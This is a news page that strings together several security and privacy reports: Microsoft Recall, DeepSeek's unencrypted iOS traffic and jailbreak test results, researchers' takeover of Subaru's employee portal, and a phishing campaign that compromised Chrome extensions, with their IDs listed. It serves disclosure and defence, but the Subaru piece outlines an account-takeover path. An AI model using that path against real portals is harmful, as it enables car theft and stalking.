When Recall was first introduced in May 2024, security practitioners roundly castigated it for creating a gold mine for malicious insiders, criminals, or nation-state spies if they managed to gain even brief administrative access to a Windows device. Privacy advocates warned that Recall was ripe for abuse in intimate partner violence settings. They also noted that there was nothing stopping Recall from preserving sensitive disappearing content sent through privacy-protecting messengers such as Signal.

Enshittification at a new scale

Following months of backlash, Microsoft later suspended Recall. On Thursday, the company said it was reintroducing Recall. It currently is available only to insiders with access to the Windows 11 Build 26100.3902 preview version. Over time, the feature will be rolled out more broadly. Microsoft officials wrote:

Recall (preview)saves you time by offering an entirely new way to search for things you’ve seen or done on your PC securely. With the AI capabilities of Copilot+ PCs, it’s now possible to quickly find and get back to any app, website, image, or document just by describing its content. To use Recall, you will need to opt-in to saving snapshots, which are images of your activity, and enroll in Windows Hello to confirm your presence so only you can access your snapshots. You are always in control of what snapshots are saved and can pause saving snapshots at any time. As you use your Copilot+ PC throughout the day working on documents or presentations, taking video calls, and context switching across activities, Recall will take regular snapshots and help you find things faster and easier. When you need to find or get back to something you’ve done previously, open Recall and authenticate with Windows Hello. When you’ve found what you were looking for, you can reopen the application, website, or document, or use Click to Do to act on any image or text in the snapshot you found.

Microsoft is hoping that the concessions requiring opt-in and the ability to pause Recall will help quell the collective revolt that broke out last year. It likely won’t for various reasons.

That groan you hear is users’ reaction to Recall going back into Windows Read More »

“myterms”-wants-to-become-the-new-way-we-dictate-our-privacy-on-the-web

“MyTerms” wants to become the new way we dictate our privacy on the web

Searls and his group are putting up the standards and letting the browsers, extension-makers, website managers, mobile platforms, and other pieces of the tech stack craft the tools. So long as the human is the first party to a contract, the digital thing is the second, a “disinterested non-profit” provides the roster of agreements, and both sides keep records of what they agreed to, the function can take whatever shape the Internet decides.

Terms offered, not requests submitted

Searls’ and his group’s standard is a plea for a sensible alternative to the modern reality of accessing web information. It asks us to stop pretending that we’re all reading agreements stuffed full with opaque language, agreeing to thousands upon thousands of words’ worth of terms every day and willfully offering up information about us. And, of course, it makes people ask if it is due to become another version of Do Not Track.

Do Not Track was a request, while MyTerms is inherently a demand. Websites and services could, of course, simply refuse to show or provide content and data if a MyTerms agent is present, or they could ask or demand that people set the least restrictive terms.

There is nothing inherently wrong with setting up a user-first privacy scheme and pushing for sites and software to do the right thing and abide by it. People may choose to stick to search engines and sites that agree to MyTerms. Time will tell if MyTerms can gain the kind of leverage Searls is aiming for.

“MyTerms” wants to become the new way we dictate our privacy on the web Read More »

privacy-problematic-deepseek-pulled-from-app-stores-in-south-korea

Privacy-problematic DeepSeek pulled from app stores in South Korea

In a media briefing held Monday, the South Korean Personal Information Protection Commission indicated that it had paused new downloads within the country of Chinese AI startup DeepSeek’s mobile app. The restriction took effect on Saturday and doesn’t affect South Korean users who already have the app installed on their devices. The DeepSeek service also remains accessible in South Korea via the web.

Per Reuters, PIPC explained that representatives from DeepSeek acknowledged the company had “partially neglected” some of its obligations under South Korea’s data protection laws, which provide South Koreans some of the strictest privacy protections globally.

PIPC investigation division director Nam Seok is quoted by the Associated Press as saying DeepSeek “lacked transparency about third-party data transfers and potentially collected excessive personal information.” DeepSeek reportedly has dispatched a representative to South Korea to work through any issues and bring the app into compliance.

It’s unclear how long the app will remain unavailable in South Korea, with PIPC saying only that the privacy issues it identified with the app might take “a considerable amount of time” to resolve.

Western infosec sources have also expressed dissatisfaction with aspects of DeepSeek’s security. Mobile security company NowSecure reported two weeks ago that the app sends information unencrypted to servers located in China and controlled by TikTok owner ByteDance; the week before that, another security company found an open, web-accessible database filled with DeepSeek customer chat history and other sensitive data.

Ars attempted to ask DeepSeek’s DeepThink (R1) model about the Tiananmen Square massacre or its favorite “Winnie the Pooh” movie, but the LLM continued to have no comment.

Privacy-problematic DeepSeek pulled from app stores in South Korea Read More »

deepseek-ios-app-sends-data-unencrypted-to-bytedance-controlled-servers

DeepSeek iOS app sends data unencrypted to ByteDance-controlled servers


Apple’s defenses that protect data from being sent in the clear are globally disabled.

A little over two weeks ago, a largely unknown China-based company named DeepSeek stunned the AI world with the release of an open source AI chatbot that had simulated reasoning capabilities that were largely on par with those from market leader OpenAI. Within days, the DeepSeek AI assistant app climbed to the top of the iPhone App Store’s “Free Apps” category, overtaking ChatGPT.

On Thursday, mobile security company NowSecure reported that the app sends sensitive data over unencrypted channels, making the data readable to anyone who can monitor the traffic. More sophisticated attackers could also tamper with the data while it’s in transit. Apple strongly encourages iPhone and iPad developers to enforce encryption of data sent over the wire using ATS (App Transport Security). For unknown reasons, that protection is globally disabled in the app, NowSecure said.

Basic security protections MIA

What’s more, the data is sent to servers that are controlled by ByteDance, the Chinese company that owns TikTok. While some of that data is properly encrypted using transport layer security, once it’s decrypted on the ByteDance-controlled servers, it can be cross-referenced with user data collected elsewhere to identify specific users and potentially track queries and other usage.

More technically, the DeepSeek AI chatbot uses an open weights simulated reasoning model. Its performance is largely comparable with OpenAI’s o1 simulated reasoning (SR) model on several math and coding benchmarks. The feat, which largely took AI industry watchers by surprise, was all the more stunning because DeepSeek reported spending only a small fraction on it compared with the amount OpenAI spent.

A NowSecure audit of the app has found other behaviors that researchers found potentially concerning. For instance, the app uses a symmetric encryption scheme known as 3DES or triple DES. The scheme was deprecated by NIST following research in 2016 that showed it could be broken in practical attacks to decrypt web and VPN traffic. Another concern is that the symmetric keys, which are identical for every iOS user, are hardcoded into the app and stored on the device.

The app is “not equipped or willing to provide basic security protections of your data and identity,” NowSecure co-founder Andrew Hoog told Ars. “There are fundamental security practices that are not being observed, either intentionally or unintentionally. In the end, it puts your and your company’s data and identity at risk.”

Hoog said the audit is not yet complete, so there are many questions and details left unanswered or unclear. He said the findings were concerning enough that NowSecure wanted to disclose what is currently known without delay.

In a report, he wrote:

NowSecure recommends that organizations remove the DeepSeek iOS mobile app from their environment (managed and BYOD deployments) due to privacy and security risks, such as:

  1. Privacy issues due to insecure data transmission
  2. Vulnerability issues due to hardcoded keys
  3. Data sharing with third parties such as ByteDance
  4. Data analysis and storage in China

Hoog added that the DeepSeek app for Android is even less secure than its iOS counterpart and should also be removed.

Representatives for both DeepSeek and Apple didn’t respond to an email seeking comment.

Data sent entirely in the clear occurs during the initial registration of the app, including:

  • organization id
  • the version of the software development kit used to create the app
  • user OS version
  • language selected in the configuration

Apple strongly encourages developers to implement ATS to ensure the apps they submit don’t transmit any data insecurely over HTTP channels. For reasons that Apple hasn’t explained publicly, Hoog said, this protection isn’t mandatory. DeepSeek has yet to explain why ATS is globally disabled in the app or why it uses no encryption when sending this information over the wire.

This data, along with a mix of other encrypted information, is sent to DeepSeek over infrastructure provided by Volcengine a cloud platform developed by ByteDance. While the IP address the app connects to geo-locates to the US and is owned by US-based telecom Level 3 Communications, the DeepSeek privacy policy makes clear that the company “store[s] the data we collect in secure servers located in the People’s Republic of China.” The policy further states that DeepSeek:

may access, preserve, and share the information described in “What Information We Collect” with law enforcement agencies, public authorities, copyright holders, or other third parties if we have good faith belief that it is necessary to:

• comply with applicable law, legal process or government requests, as consistent with internationally recognised standards.

NowSecure still doesn’t know precisely the purpose of the app’s use of 3DES encryption functions. The fact that the key is hardcoded into the app, however, is a major security failure that’s been recognized for more than a decade when building encryption into software.

No good reason

NowSecure’s Thursday report adds to growing list of safety and privacy concerns that have already been reported by others.

One was the terms spelled out in the above-mentioned privacy policy. Another came last week in a report from researchers at Cisco and the University of Pennsylvania. It found that the DeepSeek R1, the simulated reasoning model, exhibited a 100 percent attack failure rate against 50 malicious prompts designed to generate toxic content.

A third concern is research from security firm Wiz that uncovered a publicly accessible, fully controllable database belonging to DeepSeek. It contained more than 1 million instances of “chat history, backend data, and sensitive information, including log streams, API secrets, and operational details,” Wiz reported. An open web interface also allowed for full database control and privilege escalation, with internal API endpoints and keys available through the interface and common URL parameters.

Thomas Reed, staff product manager for Mac endpoint detection and response at security firm Huntress, and an expert in iOS security, said he found NowSecure’s findings concerning.

“ATS being disabled is generally a bad idea,” he wrote in an online interview. “That essentially allows the app to communicate via insecure protocols, like HTTP. Apple does allow it, and I’m sure other apps probably do it, but they shouldn’t. There’s no good reason for this in this day and age.”

He added: “Even if they were to secure the communications, I’d still be extremely unwilling to send any remotely sensitive data that will end up on a server that the government of China could get access to.”

HD Moore, founder and CEO of runZero, said he was less concerned about ByteDance or other Chinese companies having access to data.

“The unencrypted HTTP endpoints are inexcusable,” he wrote. “You would expect the mobile app and their framework partners (ByteDance, Volcengine, etc) to hoover device data, just like anything else—but the HTTP endpoints expose data to anyone in the network path, not just the vendor and their partners.”

On Thursday, US lawmakers began pushing to immediately ban DeepSeek from all government devices, citing national security concerns that the Chinese Communist Party may have built a backdoor into the service to access Americans’ sensitive private data. If passed, DeepSeek could be banned within 60 days.

This story was updated to add further examples of security concerns regarding DeepSeek.

Photo of Dan Goodin

Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him at here on Mastodon and here on Bluesky. Contact him on Signal at DanArs.82.

DeepSeek iOS app sends data unencrypted to ByteDance-controlled servers Read More »

millions-of-subarus-could-be-remotely-unlocked,-tracked-due-to-security-flaws

Millions of Subarus could be remotely unlocked, tracked due to security flaws


Flaws also allowed access to one year of location history.

About a year ago, security researcher Sam Curry bought his mother a Subaru, on the condition that, at some point in the near future, she let him hack it.

It took Curry until last November, when he was home for Thanksgiving, to begin examining the 2023 Impreza’s Internet-connected features and start looking for ways to exploit them. Sure enough, he and a researcher working with him online, Shubham Shah, soon discovered vulnerabilities in a Subaru web portal that let them hijack the ability to unlock the car, honk its horn, and start its ignition, reassigning control of those features to any phone or computer they chose.

Most disturbing for Curry, though, was that they found they could also track the Subaru’s location—not merely where it was at the moment but also where it had been for the entire year that his mother had owned it. The map of the car’s whereabouts was so accurate and detailed, Curry says, that he was able to see her doctor visits, the homes of the friends she visited, even which exact parking space his mother parked in every time she went to church.

A year of location data for Sam Curry’s mother’s 2023 Subaru Impreza that Curry and Shah were able to access in Subaru’s employee admin portal thanks to its security vulnerabilities.

Credit: Sam Curry

A year of location data for Sam Curry’s mother’s 2023 Subaru Impreza that Curry and Shah were able to access in Subaru’s employee admin portal thanks to its security vulnerabilities. Credit: Sam Curry

“You can retrieve at least a year’s worth of location history for the car, where it’s pinged precisely, sometimes multiple times a day,” Curry says. “Whether somebody’s cheating on their wife or getting an abortion or part of some political group, there are a million scenarios where you could weaponize this against someone.”

Curry and Shah today revealed in a blog post their method for hacking and tracking millions of Subarus, which they believe would have allowed hackers to target any of the company’s vehicles equipped with its digital features known as Starlink in the US, Canada, or Japan. Vulnerabilities they found in a Subaru website intended for the company’s staff allowed them to hijack an employee’s account to both reassign control of cars’ Starlink features and also access all the vehicle location data available to employees, including the car’s location every time its engine started, as shown in their video below.

Curry and Shah reported their findings to Subaru in late November, and Subaru quickly patched its Starlink security flaws. But the researchers warn that the Subaru web vulnerabilities are just the latest in a long series of similar web-based flaws they and other security researchers working with them have found that have affected well over a dozen carmakers, including Acura, Genesis, Honda, Hyundai, Infiniti, Kia, Toyota, and many others. There’s little doubt, they say, that similarly serious hackable bugs exist in other auto companies’ web tools that have yet to be discovered.

In Subaru’s case, in particular, they also point out that their discovery hints at how pervasively those with access to Subaru’s portal can track its customers’ movements, a privacy issue that will last far longer than the web vulnerabilities that exposed it. “The thing is, even though this is patched, this functionality is still going to exist for Subaru employees,” Curry says. “It’s just normal functionality that an employee can pull up a year’s worth of your location history.”

When WIRED reached out to Subaru for comment on Curry and Shah’s findings, a spokesperson responded in a statement that “after being notified by independent security researchers, [Subaru] discovered a vulnerability in its Starlink service that could potentially allow a third party to access Starlink accounts. The vulnerability was immediately closed and no customer information was ever accessed without authorization.”

The Subaru spokesperson also confirmed to WIRED that “there are employees at Subaru of America, based on their job relevancy, who can access location data.” The company offered as an example that employees have that access to share a vehicle’s location with first responders in the case when a collision is detected. “All these individuals receive proper training and are required to sign appropriate privacy, security, and NDA agreements as needed,” Subaru’s statement added. “These systems have security monitoring solutions in place which are continually evolving to meet modern cyber threats.”

Responding to Subaru’s example of notifying first responders about a collision, Curry notes that would hardly require a year’s worth of location history. The company didn’t respond to WIRED asking how far back it keeps customers’ location histories and makes them available to employees.

Shah and Curry’s research that led them to the discovery of Subaru’s vulnerabilities began when they found that Curry’s mother’s Starlink app connected to the domain SubaruCS.com, which they realized was an administrative domain for employees. Scouring that site for security flaws, they found that they could reset employees’ passwords simply by guessing their email address, which gave them the ability to take over any employee’s account whose email they could find. The password reset functionality did ask for answers to two security questions, but they found that those answers were checked with code that ran locally in a user’s browser, not on Subaru’s server, allowing the safeguard to be easily bypassed. “There were really multiple systemic failures that led to this,” Shah says.

The two researchers say they found the email address for a Subaru Starlink developer on LinkedIn, took over the employee’s account, and immediately found that they could use that staffer’s access to look up any Subaru owner by last name, zip code, email address, phone number, or license plate to access their Starlink configurations. In seconds, they could then reassign control of the Starlink features of that user’s vehicle, including the ability to remotely unlock the car, honk its horn, start its ignition, or locate it, as shown in the video below.

Those vulnerabilities alone, for drivers, present serious theft and safety risks. Curry and Shah point out that a hacker could have targeted a victim for stalking or theft, looked up someone’s vehicle’s location, then unlocked their car at any time—though a thief would have to somehow also use a separate technique to disable the car’s immobilizer, the component that prevents it from being driven away without a key.

Those car hacking and tracking techniques alone are far from unique. Last summer, Curry and another researcher, Neiko Rivera, demonstrated to WIRED that they could pull off a similar trick with any of millions of vehicles sold by Kia. Over the prior two years, a larger group of researchers, of which Curry and Shah are a part, discovered web-based security vulnerabilities that affected cars sold by Acura, BMW, Ferrari, Genesis, Honda, Hyundai, Infiniti, Mercedes-Benz, Nissan, Rolls Royce, and Toyota.

More unusual in Subaru’s case, Curry and Shah say, is that they were able to access fine-grained, historical location data for Subarus going back at least a year. Subaru may in fact collect multiple years of location data, but Curry and Shah tested their technique only on Curry’s mother, who had owned her Subaru for about a year.

Curry argues that Subaru’s extensive location tracking is a particularly disturbing demonstration of the car industry’s lack of privacy safeguards around its growing collection of personal data on drivers. “It’s kind of bonkers,” he says. “There’s an expectation that a Google employee isn’t going to be able to just go through your emails in Gmail, but there’s literally a button on Subaru’s admin panel that lets an employee view location history.”

The two researchers’ work contributes to a growing sense of concern over the enormous amount of location data that car companies collect. In December, information a whistleblower provided to the German hacker collective the Chaos Computer Computer and Der Spiegel revealed that Cariad, a software company that partners with Volkswagen, had left detailed location data for 800,000 electric vehicles publicly exposed online. Privacy researchers at the Mozilla Foundation in September warned in a report that “modern cars are a privacy nightmare,” noting that 92 percent give car owners little to no control over the data they collect, and 84 percent reserve the right to sell or share your information. (Subaru tells WIRED that it “does not sell location data.”)

“While we worried that our doorbells and watches that connect to the Internet might be spying on us, car brands quietly entered the data business by turning their vehicles into powerful data-gobbling machines,” Mozilla’s report reads.

Curry and Shah’s discovery of Subaru’s security vulnerabilities in its tracking demonstrate a particularly egregious exposure of that data—but also a privacy problem that’s hardly less disturbing now that the vulnerabilities are patched, says Robert Herrell, the executive director of the Consumer Federation of California, which has sought to create legislation for limiting a car’s data tracking.

“It seems like there are a bunch of employees at Subaru that have a scary amount of detailed information,” Herrell says. “People are being tracked in ways that they have no idea are happening.”

This story originally appeared on wired.com.

Photo of WIRED

Wired.com is your essential daily guide to what’s next, delivering the most original and complete take you’ll find anywhere on innovation’s impact on technology, science, business and culture.

Millions of Subarus could be remotely unlocked, tracked due to security flaws Read More »

time-to-check-if-you-ran-any-of-these-33-malicious-chrome-extensions

Time to check if you ran any of these 33 malicious Chrome extensions

Screenshot showing the phishing email sent to Cyberhaven extension developers. Credit: Amit Assaraf

A link in the email led to a Google consent screen requesting access permission for an OAuth application named Privacy Policy Extension. A Cyberhaven developer granted the permission and, in the process, unknowingly gave the attacker the ability to upload new versions of Cyberhaven’s Chrome extension to the Chrome Web Store. The attacker then used the permission to push out the malicious version 24.10.4.

Screenshot showing the Google permission request. Credit: Amit Assaraf

As word of the attack spread in the early hours of December 25, developers and researchers discovered that other extensions were targeted, in many cases successfully, by the same spear phishing campaign. John Tuckner, founder of Secure Annex, a browser extension analysis and management firm, said that as of Thursday afternoon, he knew of 19 other Chrome extensions that were similarly compromised. In every case, the attacker used spear phishing to push a new malicious version and custom, look-alike domains to issue payloads and receive authentication credentials. Collectively, the 20 extensions had 1.46 million downloads.

“For many I talk to, managing browser extensions can be a lower priority item in their security program,” Tuckner wrote in an email. “Folks know they can present a threat, but rarely are teams taking action on them. We’ve often seen in security [that] one or two incidents can cause a reevaluation of an organization’s security posture. Incidents like this often result in teams scrambling to find a way to gain visibility and understanding of impact to their organizations.”

The earliest compromise occurred in May 2024. Tuckner provided the following spreadsheet:

Name ID Version Patch Available Users Start End
VPNCity nnpnnpemnckcfdebeekibpiijlicmpom 2.0.1 FALSE 10,000 12/12/24 12/31/24
Parrot Talks kkodiihpgodmdankclfibbiphjkfdenh 1.16.2 TRUE 40,000 12/25/24 12/31/24
Uvoice oaikpkmjciadfpddlpjjdapglcihgdle 1.0.12 TRUE 40,000 12/26/24 12/31/24
Internxt VPN dpggmcodlahmljkhlmpgpdcffdaoccni 1.1.1 1.2.0 TRUE 10,000 12/25/24 12/29/24
Bookmark Favicon Changer acmfnomgphggonodopogfbmkneepfgnh 4.00 TRUE 40,000 12/25/24 12/31/24
Castorus mnhffkhmpnefgklngfmlndmkimimbphc 4.40 4.41 TRUE 50,000 12/26/24 12/27/24
Wayin AI cedgndijpacnfbdggppddacngjfdkaca 0.0.11 TRUE 40,000 12/19/24 12/31/24
Search Copilot AI Assistant for Chrome bbdnohkpnbkdkmnkddobeafboooinpla 1.0.1 TRUE 20,000 7/17/24 12/31/24
VidHelper – Video Downloader egmennebgadmncfjafcemlecimkepcle 2.2.7 TRUE 20,000 12/26/24 12/31/24
AI Assistant – ChatGPT and Gemini for Chrome bibjgkidgpfbblifamdlkdlhgihmfohh 0.1.3 FALSE 4,000 5/31/24 10/25/24
TinaMind – The GPT-4o-powered AI Assistant! befflofjcniongenjmbkgkoljhgliihe 2.13.0 2.14.0 TRUE 40,000 12/15/24 12/20/24
Bard AI chat pkgciiiancapdlpcbppfkmeaieppikkk 1.3.7 FALSE 100,000 9/5/24 10/22/24
Reader Mode llimhhconnjiflfimocjggfjdlmlhblm 1.5.7 FALSE 300,000 12/18/24 12/19/24
Primus (prev. PADO) oeiomhmbaapihbilkfkhmlajkeegnjhe 3.18.0 3.20.0 TRUE 40,000 12/18/24 12/25/24
Cyberhaven security extension V3 pajkjnmeojmbapicmbpliphjmcekeaac 24.10.4 24.10.5 TRUE 400,000 12/24/24 12/26/24
GraphQL Network Inspector ndlbedplllcgconngcnfmkadhokfaaln 2.22.6 2.22.7 TRUE 80,000 12/29/24 12/30/24
GPT 4 Summary with OpenAI epdjhgbipjpbbhoccdeipghoihibnfja 1.4 FALSE 10,000 5/31/24 9/29/24
Vidnoz Flex – Video recorder & Video share cplhlgabfijoiabgkigdafklbhhdkahj 1.0.161 FALSE 6,000 12/25/24 12/29/24
YesCaptcha assistant jiofmdifioeejeilfkpegipdjiopiekl 1.1.61 TRUE 200,000 12/29/24 12/31/24
Proxy SwitchyOmega (V3) hihblcmlaaademjlakdpicchbjnnnkbo 3.0.2 TRUE 10,000 12/30/24 12/31/24

But wait, there’s more

One of the compromised extensions is called Reader Mode. Further analysis showed it had been compromised not just in the campaign targeting the other 19 extensions but in a separate campaign that started no later than April 2023. Tuckner said the source of the compromise appears to be a code library developers can use to monetize their extensions. The code library collects details about each web visit a browser makes. In exchange for incorporating the library into the extensions, developers receive a commission from the library creator.

Time to check if you ran any of these 33 malicious Chrome extensions Read More »